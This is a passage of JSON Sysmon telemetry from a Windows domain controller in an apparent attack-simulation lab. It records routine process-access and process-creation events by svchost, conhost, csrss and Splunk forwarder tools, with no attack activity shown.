System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2076,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.302\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.302","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2077,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.302\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.302","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2078,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.302\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.302","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2079,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.302\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-106F-5F25-0000-00106CF10300}\r\nTargetProcessId: 4084\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.302","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-106F-5F25-0000-00106CF10300}","TargetProcessId":"4084","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2080,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.313\r\nProcessGuid: {E2A3D6B1-106F-5F25-0000-00102DF20300}\r\nProcessId: 3780\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {E2A3D6B1-106F-5F25-0000-00106CF10300}\r\nParentProcessId: 4084\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  server list general --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.313","ProcessGuid":"{E2A3D6B1-106F-5F25-0000-00102DF20300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{E2A3D6B1-106F-5F25-0000-00106CF10300}","ParentProcessId":"4084","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  server list general --no-log","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2081,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.302\r\nSourceProcessGUID: {E2A3D6B1-106F-5F25-0000-00106CF10300}\r\nSourceProcessId: 4084\r\nSourceThreadId: 4088\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-001076950300}\r\nTargetProcessId: 3780\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.302","SourceProcessGUID":"{E2A3D6B1-106F-5F25-0000-00106CF10300}","SourceProcessId":"4084","SourceThreadId":"4088","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-001076950300}","TargetProcessId":"3780","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2082,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.302\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-001076950300}\r\nTargetProcessId: 3780\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.302","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-001076950300}","TargetProcessId":"3780","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2083,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.302\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.302","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2084,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.302\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.302","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"